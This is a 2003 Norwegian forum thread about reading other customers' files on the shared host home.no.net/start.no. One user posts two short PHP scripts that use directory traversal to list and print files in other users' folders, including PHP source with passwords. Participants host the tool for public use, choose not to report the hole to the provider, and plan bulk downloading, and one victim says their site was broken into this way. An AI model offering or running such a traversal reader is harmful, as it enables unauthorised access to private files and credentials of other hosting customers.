Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
AbonnerSkjul
Host1.no - Webhotell fra 29,-, virtuell server fra 249,-. 15% rabatt med rabattkode "nFF". Besøk oss på Host1.no!
  60 3148
echo_
echo_'s Avatar
897 0
22. januar 2003
Hva har skjedd med home.no.net? Før var det mulig å lese de andres kontoer, nå funker ikke dette lenger. Noen som har en løsning på dette?

(om denne er postet feil ber jeg herved mod om å flytte, så slipper vi kommentarer om det)...

Vet at ihvertfall meitemark kan noe om dette..?
Goda
..
1.959 349
22. januar 2003
Hva mener du med "lese de andres kontoer" ?
Lese hvilke andre brukernavn som fantes når du browset med ftp, eller å kunne gå inn på mappene deres ?
echo_
echo_'s Avatar
Trådstarter
897 0
22. januar 2003
1. Man logger inn med en konto man allerede har, f.eks bruker "test".
2. Man endrer pathen fra home/t/te/test/public_html/ til en annens konto, for eksempel oles; home/o/ol/oleskonto/public_html/
Om man gjorde dette kunne man se alle filene som lå der, man kunne også lese dem.

Dette var veldig greit når det kom til å se ting som lå bak passordbeskyttelse, men det funker ikke lenger. ARG!
CoDEmASTeR
CoDEmASTeR's Avatar
1.833 7
22. januar 2003
Skriv mail til dem å klag
reallife
< 0 >
reallife's Avatar
1.366 19
22. januar 2003
de har forbedret sikkerheten sin det var egentlig en ulempe likte og laste ned andres filer dersom jeg fant no intresant

edit:
Kanskje man kan accesse det via et php script som leser filer ?

kan prøve det senere i kveld
echo_
echo_'s Avatar
Trådstarter
897 0
22. januar 2003
Opprinnelig postet av CoDEmASTeR
Skriv mail til dem å klag
Vis hele sitatet...
ØØØØØY!!!
Sikkerheten deres er for bra!!!!
Ikke ork det da!

Nei, tror nok vi kan se langt etter det.

Reallife: si i fra hvordan det går da..
reallife
< 0 >
reallife's Avatar
1.366 19
22. januar 2003
jeg prøvde litt men fant ut at mappen home.no.net sender ut websider fra er denne : home/p/pt/pt-home/public_html
litt merkelig ja, jeg klarte desverre ikke finne noen løsning, kanskje det er noen andre som kan ?
(er ikke veldig god på php enda heller)
YMMIT2
YMMIT2's Avatar
23 0
22. januar 2003
Enkel sak med to filer, kunne garantert vært gjort bedre, men... Here it goes:
list.php:

Kode

<?php
  $dirname = "../../../../../../home/t/te/test/public_html/";
  if(is_dir($dirname)){
    echo "<H3>Innhold i $dirname</H3>";
    $handle=opendir($dirname);
    while (false!==($file = readdir($handle))) {
      echo "<A HREF=\"lesfil.php?f=$dirname$file\">$file</A><BR>";
    }
  } else {
    die("Hjall...");
  }
?>
lesfil.php:

Kode

<?php
  if(empty($f)){
    die("Drit i!");
  } else {
    if(file_exists($f)){
      echo nl2br(implode("", file($f)));
    }
  }
?>
Funker ihvertfall utmerket
reallife
< 0 >
reallife's Avatar
1.366 19
22. januar 2003
der ser du hvor mye jeg kunne skjønte ikke helt det det engang, men men takk anyways =)
m|x
m|x's Avatar
401 0
22. januar 2003
awwg. skulle logge inn på konton min i går. så hadde de slettet den. er ganske sikker på at det ikke var noe ille innhold på den en gang. *sukk* får lage en ny da
cavey
cavey's Avatar
1.193 12
22. januar 2003
kanskje brukerne har satt rettighetene til "group" til null?
YMMIT2
YMMIT2's Avatar
23 0
22. januar 2003
Du, ja, men ikke så mange andre
meitemark
meitemark's Avatar
DonorAdministrator
10.153 4.178
22. januar 2003
kult, klappe klappe klappe... endelig har de fikset det de har total drete seg ut på alle de årene serveren har vært oppe. enedelig gå det ann å bruke serveren til noe annet enn lagringsplass.

den gang i tiden jeg hadde kontakt med powertech.no som er de som eier serveren, så sa de at:
Vi er veldig klar over det du omtaler som et sikkerhetshull, og vil
gjøre oppmerksomme på at det ikke er et sikkerhetshull i vår server eller problemer knyttet til driften av den. I den grad dette er et problem er det fordi brukerne selv ikke er sikkerhetsbevisste.
Det er det dessverre lite vi kan gjøre med.
-11 jan 02
Vis hele sitatet...
det de kunne ha gjort var på sette CHMOD 701 på /home

"lite å gjøre med det"

menmen, nå er jeg bare glad fordi de faktisk har gjort noe med saken

mm
echo_
echo_'s Avatar
Trådstarter
897 0
22. januar 2003
Opprinnelig postet av meitemark
kult, klappe klappe klappe... endelig har de fikset det de har total drete seg ut på alle de årene serveren har vært oppe. enedelig gå det ann å bruke serveren til noe annet enn lagringsplass.
Vis hele sitatet...
Vel, men hva hjelper det nå uansett; bare å modifisere YMMIT2's script og man kan browse de mappene man vil
meitemark
meitemark's Avatar
DonorAdministrator
10.153 4.178
23. januar 2003
oki... så finnes det en hack til det...

hrmf.. gidder ikke å gi melding til powertech om det

mm
echo_
echo_'s Avatar
Trådstarter
897 0
23. januar 2003
Opprinnelig postet av meitemark


hrmf.. gidder ikke å gi melding til powertech om det

mm
Vis hele sitatet...
Nei, det får de finne ut selv.
YMMIT2
YMMIT2's Avatar
23 0
23. januar 2003
Ikke noe veldig hokus pokus, men det ser ihvertfall ut til å funke greit... Passord på zip-fila er nFF... Enjoy :P Legg i en public_html mappe (eller endre pathen bittelitt...). Noen som gidder å sette opp en konto til dette, som alle kan bruke?
kanonkølla
115 0
23. januar 2003
kontoen min ble likegodt sletta den.... :/
arniemar
arniemar's Avatar
110 0
23. januar 2003
Donerer den gamle kontoen min, så kan det ligge der i lag med 11 MB porrbannere. men det er en annen historie.

http://home.no.net/arniemar/start/
vidder
/dev/null
vidder's Avatar
1.964 13
23. januar 2003
YMMIT2:
Koden funker greit, men ikke på bilder
echo_
echo_'s Avatar
Trådstarter
897 0
23. januar 2003
Det er vel fordi den leser filens innhold, ikke kjører den..
Uansett er vel dette egentlig bre å tippe sånn ca. hvor den bilde-fila ligger...
Og så kan man gå direkte til den urlen?

Med det scriptet kan man lese php-filer ol. Det er vel det viktigste.
YMMIT2
YMMIT2's Avatar
23 0
23. januar 2003
arniemar: Finfint

vidder: xbyte har rett, problemet er at IE ikke takler mime-types helt perfekt, og jeg tror koden jeg endte opp med funket dårlig på dette området i Opera også, faktisk dårligere, men det er jo ikke verre enn at noen kan utvide scriptet litt så man har en link til selve filen også... Eller du kan altså klippe og lime litt og få riktig url.

Etter å ha brukt scriptet litt har jeg jo kommet over endel småbugs, men det er jo bare til tvilsomt bruk, uansett, så... Hvis noen har lyst kan de jo alltids lage en bedre versjon, men personlig har jeg ikke egentlig bruk for noe mer...

Yep
echo_
echo_'s Avatar
Trådstarter
897 0
23. januar 2003
YMMIT2: kom deg på msn di kådde, vi skal diskutere prosjektorer :P
YMMIT2
YMMIT2's Avatar
23 0
23. januar 2003
Hehe, kommer
Geddi
trendhore
Geddi's Avatar
967 7
23. januar 2003
xbyte: hva med å ta det over pm?


Har lagt merke til at man ikke kan browse de aller nyeste kontoene
echo_
echo_'s Avatar
Trådstarter
897 0
23. januar 2003
Opprinnelig postet av Geddi
xbyte: hva med å ta det over pm?


Har lagt merke til at man ikke kan browse de aller nyeste kontoene
Vis hele sitatet...
Tja, nå tok jeg det liksom her da.. men nok om det..

Nå kan du ikke browse NOEN av kontoene på start.no ...
larsforstyrret
utenfor ditt vindu
larsforstyrret's Avatar
785 2
23. januar 2003
Nesten Over Genialt det scriptet der=)
YMMIT2
YMMIT2's Avatar
23 0
24. januar 2003
Takker, CrazYWeb

Geddi: Ja, jeg har lagt merke til det, start.no har begynt, for en stund siden, å chmode alle nye brukermapper, ser det ut til, mens gamle forblir leselige, til glede for deg og meg...

Godt mulig at jeg gjør noen små forbedringer på det i løpet av de neste par dagene... arniemar, er det greit at jeg sender eventuelle oppdateringer til deg, så du kan laste dem opp på kontoen din?

Må ihvertfall si at start.no er svært så gavmilde... Det skal de ha for

YMMIT2
...signing off...

Edit:
xbyte: Jo, det kan du vel... Jeg har ingen problemer med det, ihvertfall, kanskje det var noe midlertidig?
Sist endret av YMMIT2; 24. januar 2003 kl. 00:20.
arniemar
arniemar's Avatar
110 0
24. januar 2003
Helt i orden.
Geddi
trendhore
Geddi's Avatar
967 7
24. januar 2003
vil ikke si at dette bare er en fordel... f.eks man kan finne passordet til sidene og slikt.. jeg hoster selv sider der.. Derfor kan dette bli brukt mot degselv


Ble litt dårlig skrevet.. God natt :P
echo_
echo_'s Avatar
Trådstarter
897 0
24. januar 2003
Opprinnelig postet av Geddi
vil ikke si at dette bare er en fordel... f.eks man kan finne passordet til sidene og slikt.. jeg hoster selv sider der.. Derfor kan dette bli brukt mot degselv


Ble litt dårlig skrevet.. God natt :P
Vis hele sitatet...
Ikke legg ting man ikke vil at andre skal se på home.no.net, det er så masse hull der at mange kan gjøre hva de vil
YMMIT2
YMMIT2's Avatar
23 0
24. januar 2003
For meg personlig er ikke dette et problem. Jeg oppfordrer ikke folk til å la sensitive filer ligge ubeskyttet på home.no.net, eller "beskyttet", for den saks skyld, bortsett fra at det selvfølgelig kan være moro for meg og andre med meg

arniemar: Kjempemessig Vurderer å lage en funksjon som legger alle filene til en bestemt bruker i en fin zip-fil, som man så kan laste ned og som deretter slettes... Noen som har noe ønske om dette?
cavey
cavey's Avatar
1.193 12
24. januar 2003
Opprinnelig postet av kanonkølla
kontoen min ble likegodt sletta den.... :/
Vis hele sitatet...
fordi du testet ut scriptet?

---

noen som har testet dette ut og fått det til å virke?
echo_
echo_'s Avatar
Trådstarter
897 0
24. januar 2003
Opprinnelig postet av cavey
fordi du testet ut scriptet?

---

noen som har testet dette ut og fått det til å virke?
Vis hele sitatet...
scriptet? ja; det funker:
http://home.no.net/arniemar/start/
Eristoff
169 0
24. januar 2003
Så det er slik de hacket min start.no siden fyfaaen så elendig sikkerhet!! Jeg hadde brukt ett ganske personligpassord der!
Takk for info'en!
cavey
cavey's Avatar
1.193 12
24. januar 2003
brukernavn: cavey [åpne]

mapper:
Adgang forbudt



testet en annen jeg hadde laget... og der kom jeg inn. så gikk jeg inn på ftpen, og så selvsagt at jeg hadde glemt å sette 701 rettigheter på public_html mappen...

så sorry... så lenge folk tar vekk leserettighetene på mappene sine (for web/other) så funker nok ikke det scriptet.
Sist endret av cavey; 24. januar 2003 kl. 15:20.
YMMIT2
YMMIT2's Avatar
23 0
24. januar 2003
Det har vi vel for lengst konkludert med, cavey Svakheten vi utnytter er jo den at de fleste start.no-brukerne faktisk har enda dårligere peiling på sikkerhet enn powertech
cavey
cavey's Avatar
1.193 12
24. januar 2003
sorry, bare jeg som ikke kan lese
YMMIT2
YMMIT2's Avatar
23 0
24. januar 2003
Hehe, ikkenoproblem Du var jo også først ute med å hinte til group-rettigheter, så kanskje det går like mye på hukommelsen som på lesevansker?
kanonkølla
115 0
25. januar 2003
Opprinnelig postet av cavey
fordi du testet ut scriptet?

---

noen som har testet dette ut og fått det til å virke?
Vis hele sitatet...
nei... fikk amil fra suport nå... de sier det var fordi jeg ikke hadde lagt inn fulstendige personlige opplysninger...
▼ ... over en uke senere ... ▼
YMMIT2
YMMIT2's Avatar
23 0
5. februar 2003
arniemar har nå lastet opp en liten oppdatering av scriptet, det viser filer litt greiere nå, pluss at overskriften, som er en h1, ikke lengre forsøkes lukket med en h2 Hvis noen vil ha den nye koden kan de vel strengt tatt bare ta turen til http://home.no.net/arniemar/start/br...ic_html/start/

Ellers en stor takk til arniemar

Y2
cavey
cavey's Avatar
1.193 12
5. februar 2003
hmmm... funker ikke å browse bokstaver...
YMMIT2
YMMIT2's Avatar
23 0
5. februar 2003
Rart, jeg sikkert funnet på noe kødd Fikser det når jeg rekker/orker...

Edit:
Opplisting av brukere er uansett ikke så utrolig effektivt, mer bare for gøy
Gusto
improbable
Gusto's Avatar
DonorAdministrator
3.634 224
5. februar 2003
Nå vet jeg ikke om home.no.net har register_globals slått på eller ei, men hvis den ikke er på (som forøvrig er standard i PHP 4.2.0 og oppover, så må du bruke $_GET['page'] istedenfor $page i switchen din.
reallife
< 0 >
reallife's Avatar
1.366 19
5. februar 2003
Opprinnelig postet av cavey
hmmm... funker ikke å browse bokstaver...
Vis hele sitatet...
vet ikke men kanskje fordi det er så mange brukere ?
Gusto
improbable
Gusto's Avatar
DonorAdministrator
3.634 224
5. februar 2003
Opprinnelig postet av reallife
vet ikke men kanskje fordi det er så mange brukere ?
Vis hele sitatet...
Du har rett. Du vet ikke.
arniemar
arniemar's Avatar
110 0
5. februar 2003
Jo det funker fint å browse på bokstaver, men da må gå til http://home.no.net/arniemar/start/ først, ikke til http://home.no.net/arniemar/start/br...ic_html/start/
YMMIT2
YMMIT2's Avatar
23 0
5. februar 2003
Ja, veit, har bare aldri vendt meg til det... Det kommer nok med tida, inntil videre funker det like bra sånn som dette

reallife: Nei, da ville den fått timeout error, eller noe sånt kos

Det er jo uansett mange nok ting å forandre på til at jeg kan skrive videre på det når jeg får lyst Bottom line: Vi får tak i filene
YMMIT2
YMMIT2's Avatar
23 0
5. februar 2003
Ah, så klart, mangler index.php (evt '.') i linkene i header.php
Yallis
Yallis's Avatar
222 0
5. februar 2003
vet ikke om det har blitt sagt, men det som var "problemet" før var jo at man kunne liste og hente filer på andres områder, også utenfor /public_html (og forsåvidt hele serveren) dermed kunne man lese filer som egentlig ikke skulle være tilgjengelig fra web. hvis en fil var chmodda for at et script skulle kunne skrive til den, kunne det gjøres uansett bruker.
jeg kontakta powertech om dette for lenge siden, de sa de var klar over det og skulle fikse det, men det tok altså såpass lang tid.

vel, vel, vel, vel, vel, vel-vel.
1 2 >